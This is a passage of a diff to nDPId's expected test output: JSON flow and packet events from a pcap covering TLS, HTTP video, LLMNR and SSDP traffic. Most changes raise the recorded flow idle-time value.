-00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":511,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1470104381238,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104381238,"pkt":"ABAj4ACgYMVHBbyMCABFAAAo9WxAAEAGS7fAqAUQwKhzS9F3AbseAeEWRPEhV1AQIABdlQAAcnZlcjBd"} -00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104381237,"flow_last_seen":1470104381239,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1470104381239,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53623,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01095{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":514,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104381237,"flow_last_seen":1470104381243,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":378,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1470104381243,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53623,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": 
{"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"799135475da362592a4be9199d258726","ja3s":"573a9f3f80037fb40d481e2054def5bb","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":509,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381237,"flow_last_seen":1470104381237,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104381237,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53623,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":509,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1470104381237,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1470104381237,"pkt":"ABAj4ACgYMVHBbyMCABFAABAk\/BAAEAGrRvAqAUQwKhzS9F3AbseAeEVAAAAALAC\/\/84nQAAAgQFtAEDAwUBAQgKGg8YWwAAAAAEAgAA"} 
+00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":510,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1470104381238,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104381238,"pkt":"ABxCjnAxABAj4ACgCABFAAA0AABAAEAGQRjAqHNLwKgFEAG70XdE8SFWHgHhFoASFtAl8wAAAgQFtAEBBAIBAwMH"} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":511,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1470104381238,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104381238,"pkt":"ABAj4ACgYMVHBbyMCABFAAAo9WxAAEAGS7fAqAUQwKhzS9F3AbseAeEWRPEhV1AQIABdlQAAcnZlcjBd"} +00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104381237,"flow_last_seen":1470104381239,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1470104381239,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53623,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01095{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":514,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104381237,"flow_last_seen":1470104381243,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":378,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1470104381243,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53623,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"799135475da362592a4be9199d258726","ja3s":"573a9f3f80037fb40d481e2054def5bb","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":539,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1470104381626,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1470104381626,"pkt":"AQBeAAD8CJ4BzeuNCABFAAA2U7AAAAERvz3AqAUl4AAA\/NwuFOsAIuU8ydMAAAABAAAAAAAACG5vdGVib29rAAD\/AAE="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":552,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381895,"flow_last_seen":1470104381895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104381895,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.145","src_port":49612,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":552,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1470104381895,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104381895,"pkt":"TF4M6gNlABxCjnAxCABFAAA0Ui5AAIAGjNDAqHMIt4MwkcHMAFBbXvEQAAAAAIACIAAlhwAAAgQE7AEDAwgBAQQC"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1470104381895,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104381895,"pkt":"TF4M6gNlABxCjnAxCABFAAA0Ui5AAIAGjNDAqHMIt4MwkcHMAFBbXvEQAAAAAIACIAAlhwAAAgQE7AEDAwgBAQQC"} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":552,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381895,"flow_last_seen":1470104381895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104381895,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.145","src_port":49612,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":552,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1470104381895,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104381895,"pkt":"TF4M6gNlABxCjnAxCABFAAA0Ui5AAIAGjNDAqHMIt4MwkcHMAFBbXvEQAAAAAIACIAAlhwAAAgQE7AEDAwgBAQQC"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1470104381895,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104381895,"pkt":"TF4M6gNlABxCjnAxCABFAAA0Ui5AAIAGjNDAqHMIt4MwkcHMAFBbXvEQAAAAAIACIAAlhwAAAgQE7AEDAwgBAQQC"} 
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":554,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381935,"flow_last_seen":1470104381935,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104381935,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"224.0.0.252","src_port":58456,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":554,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1470104381935,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1470104381935,"pkt":"AQBeAAD8uKxvwfbSCABFAAA3J0MAAAERi63AqGUh4AAA\/ORYFOsAI152CJsAAAABAAAAAAAACUpvYW5uYS1QQwAA\/wAB"} 00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":554,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381935,"flow_last_seen":1470104381935,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104381935,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"224.0.0.252","src_port":58456,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
@@ -211,16 +211,16 @@ 00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":555,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381935,"flow_last_seen":1470104381935,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104381935,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"224.0.0.252","src_port":58456,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":556,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1470104381935,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1470104381935,"pkt":"AQBef\/\/6uKxv2MGbCABFAAClQRQAAAQRv1\/AqAUy7\/\/\/+vyiB2wAkVLKTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} 00620{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":557,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1470104381935,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104381935,"pkt":"AQBef\/\/6SNIkYwreCABFAAChfiEAAAERhV\/AqAUp7\/\/\/+tgQB2wAjcOhTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 
-00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":558,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1470104381968,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1470104381968,"pkt":"ABxCjnAxTF4M6gNlCABFAAAsAABAADEGLge3gzCRwKhzCABQwcyPbNg5W17xEWASOQjNFQAAAgQFtAAA"} -01209{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":561,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104381895,"flow_last_seen":1470104381978,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":432,"flow_tot_l4_payload_len":432,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1470104381978,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.145","src_port":49612,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"183.131.48.145","url":"183.131.48.145\/vlive.qqvideo.tc.qq.com\/u0020mkrnds.p1203.1.mp4?vkey=7AB139BF6B32F53747E8FF192E6FE557B3A3D644C034E34BF6EAEB4E0774F2A92EF3AC5C007520BB925E5C8A18E6D302C2DAE0A295B26AA8FD1DC8069D47CE1B4A16A56870BD1ACA3E86ABE4C079659DB2182FC71217AB68CCD344CE65694457E3F53549CD617D5C9F671A26C70DC68F93F1D7BCD017762F&guid=F5EB01CC01A8E08CD83630828DE17C2B02162FD8","code":0,"content_type":"","user_agent":""}} 
+00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":558,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1470104381968,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1470104381968,"pkt":"ABxCjnAxTF4M6gNlCABFAAAsAABAADEGLge3gzCRwKhzCABQwcyPbNg5W17xEWASOQjNFQAAAgQFtAAA"} +01209{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":561,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104381895,"flow_last_seen":1470104381978,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":432,"flow_tot_l4_payload_len":432,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1470104381978,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.145","src_port":49612,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"183.131.48.145","url":"183.131.48.145\/vlive.qqvideo.tc.qq.com\/u0020mkrnds.p1203.1.mp4?vkey=7AB139BF6B32F53747E8FF192E6FE557B3A3D644C034E34BF6EAEB4E0774F2A92EF3AC5C007520BB925E5C8A18E6D302C2DAE0A295B26AA8FD1DC8069D47CE1B4A16A56870BD1ACA3E86ABE4C079659DB2182FC71217AB68CCD344CE65694457E3F53549CD617D5C9F671A26C70DC68F93F1D7BCD017762F&guid=F5EB01CC01A8E08CD83630828DE17C2B02162FD8","code":0,"content_type":"","user_agent":""}} 
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":563,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1470104382036,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1470104382036,"pkt":"AQBeAAD8uKxvwfbSCABFAAA3J0UAAAERi6vAqGUh4AAA\/ORYFOsAI152CJsAAAABAAAAAAAACUpvYW5uYS1QQwAA\/wAB"} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":564,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1470104382038,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1470104382038,"pkt":"AQBeAAD8cPGh+Cr9CABFAAA3fUUAAAERlcPAqAUJ4AAA\/ORYFOsAI76OCJsAAAABAAAAAAAACUpvYW5uYS1QQwAA\/wAB"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":569,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382053,"flow_last_seen":1470104382053,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104382053,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.144","src_port":49613,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":569,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1470104382053,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104382053,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UjJAAIAGjM3AqHMIt4MwkMHNAFBSJ8A7AAAAAIACIABfkwAAAgQE7AEDAwgBAQQC"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":570,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1470104382053,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104382053,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UjJAAIAGjM3AqHMIt4MwkMHNAFBSJ8A7AAAAAIACIABfkwAAAgQE7AEDAwgBAQQC"} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":573,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1470104382122,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1470104382122,"pkt":"ABxCjnAxTF4M6gNlCABFAAAsAABAADEGLgi3gzCQwKhzCABQwc0rYeLSUifAPGASOQhglAAAAgQFtAAA"} -01280{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":577,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104382053,"flow_last_seen":1470104382125,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":503,"flow_tot_l4_payload_len":503,"flow_avg_l4_payload_len":83,"midstream":0,"thread_ts_msec":1470104382125,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.144","src_port":49613,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"183.131.48.144","url":"183.131.48.144\/vlive.qqvideo.tc.qq.com\/u0020mkrnds.p1203.1.mp4?vkey=7AB139BF6B32F53747E8FF192E6FE557B3A3D644C034E34BF6EAEB4E0774F2A92EF3AC5C007520BB925E5C8A18E6D302C2DAE0A295B26AA8FD1DC8069D47CE1B4A16A56870BD1ACA3E86ABE4C079659DB2182FC71217AB68CCD344CE65694457E3F53549CD617D5C9F671A26C70DC68F93F1D7BCD017762F&guid=F5EB01CC01A8E08CD83630828DE17C2B02162FD8&locid=a06f98fd-fa26-44e5-acc5-0d83f9df03af&size=9418655&ocid=253564332","code":0,"content_type":"","user_agent":""}} -01304{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":582,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1470104382053,"flow_last_seen":1470104382192,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":503,"flow_tot_l4_payload_len":1287,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1470104382192,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.144","src_port":49613,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Media"},"http": 
{"hostname":"183.131.48.144","url":"183.131.48.144\/vlive.qqvideo.tc.qq.com\/u0020mkrnds.p1203.1.mp4?vkey=7AB139BF6B32F53747E8FF192E6FE557B3A3D644C034E34BF6EAEB4E0774F2A92EF3AC5C007520BB925E5C8A18E6D302C2DAE0A295B26AA8FD1DC8069D47CE1B4A16A56870BD1ACA3E86ABE4C079659DB2182FC71217AB68CCD344CE65694457E3F53549CD617D5C9F671A26C70DC68F93F1D7BCD017762F&guid=F5EB01CC01A8E08CD83630828DE17C2B02162FD8&locid=a06f98fd-fa26-44e5-acc5-0d83f9df03af&size=9418655&ocid=253564332","code":206,"content_type":"video\/mp4","user_agent":""}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":569,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382053,"flow_last_seen":1470104382053,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104382053,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.144","src_port":49613,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":569,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1470104382053,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104382053,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UjJAAIAGjM3AqHMIt4MwkMHNAFBSJ8A7AAAAAIACIABfkwAAAgQE7AEDAwgBAQQC"} 
+00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":570,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1470104382053,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104382053,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UjJAAIAGjM3AqHMIt4MwkMHNAFBSJ8A7AAAAAIACIABfkwAAAgQE7AEDAwgBAQQC"} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":573,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1470104382122,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1470104382122,"pkt":"ABxCjnAxTF4M6gNlCABFAAAsAABAADEGLgi3gzCQwKhzCABQwc0rYeLSUifAPGASOQhglAAAAgQFtAAA"} +01280{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":577,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104382053,"flow_last_seen":1470104382125,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":503,"flow_tot_l4_payload_len":503,"flow_avg_l4_payload_len":83,"midstream":0,"thread_ts_msec":1470104382125,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.144","src_port":49613,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
